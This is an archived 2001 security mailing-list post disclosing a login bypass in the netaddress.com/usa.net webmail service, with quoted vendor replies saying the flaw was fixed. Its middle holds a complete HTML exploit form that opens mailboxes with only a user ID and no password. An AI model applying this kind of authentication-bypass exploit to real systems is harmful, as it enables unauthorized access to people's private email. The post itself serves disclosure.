Netaddress Secutity issue solved

From: syed mohamed (syedblrat_private)
Date: Thu Aug 02 2001 - 11:32:36 PDT

Next message: pajaat_private: "Trend Micro InterScan VirusWall - AV control bypass"

Previous message: SECURITY: "snmpd log files long names problems"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

Vulnerable
==========
netaddress.com mailing service

This mail is Continuation of the previous mails i sent regarding security 
flaw in netaddress.com, which will open anybody's mailbox with out password.

i got a mail with attached html page. which is nothing but saved html home 
page of netaddress.com(old one).Itz old home page design. when i submit the 
form without password it opened the mail box. Yes it opens every mail box 
without password. All you need is valid netaddress id.

Problem:

While submitting the login form to /tpl/Door/Login it needs just only three 
parameters maidid, domainid(value=4), domain(value=usa.net). Create a html 
file which contains all the three parameters. sumit the form to 
http://netaddress.com//tpl/door/login . Note that give double slash after 
neraddress.com. while i tried with single slash it didn`t work.

Here is the Exploit code(save this as html and run it in local. Submit only 
with userid)

Exploit Code:

<html>
<form name="loginform"
              action="http://classic.netaddress.com//tpl/Door/LoginPost" 
method="POST" target=_blank>
<input type="hidden" name="LoginState" value="2">

            <input type="hidden" name="DomainID" value="4">
             <input type="hidden" name="Domain" value="usa.net">


<b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole - 
Demo</font></b><font face="Arial" size="2"><br>
<br>
Developed By Syed Mohamed (<a 
href="mailto:syedblrat_private">syedblrat_private</a>)<br>
<br>
Just Enter Login ID (enter example if netaddress id is 
exampleat_private)</font>
<p>


<input type="text" size="16" name="UserID"
               value="">
<input type="submit" value="Login">
</form>
</p>
</html>

I hv informed the issue to usa.net.( i had only abuse and postmaster id of 
usa.net.. info id bounced back) ook 3 hrs to solve this issue.
Now they hv solved the issue.

Vendor's response:
==================
First Response:
===============
Thank you for your notification.  We are addressing this issue.

Regards,
USA.NET, Inc.

Second Response:
================
Dear Sir/Madam,

USA.NET’s technical and security teams have been made aware of this issue
and it has been corrected.  We appreciate your patience as we strive to
bring you the most robust email solution possible.

Regards,
Abuse Dept.
abuseat_private
USA.Net, Inc.


Third Respose:
=============
Yes, this problem has been corrected.

Thank you for your assistance,

USA.NET, Inc.

Thankx to usa.net for responding with great speed


Thankx to my friend Thejaswini who forwarded the old netaddress html page.

Regards
Syed Mohamed
syedblrat_private
(Wanna defeat hackers..think like a hacker.. work like a secutity expert)


_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

Next message: pajaat_private: "Trend Micro InterScan VirusWall - AV control bypass"
Previous message: SECURITY: "snmpd log files long names problems"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Aug 02 2001 - 11:47:03 PDT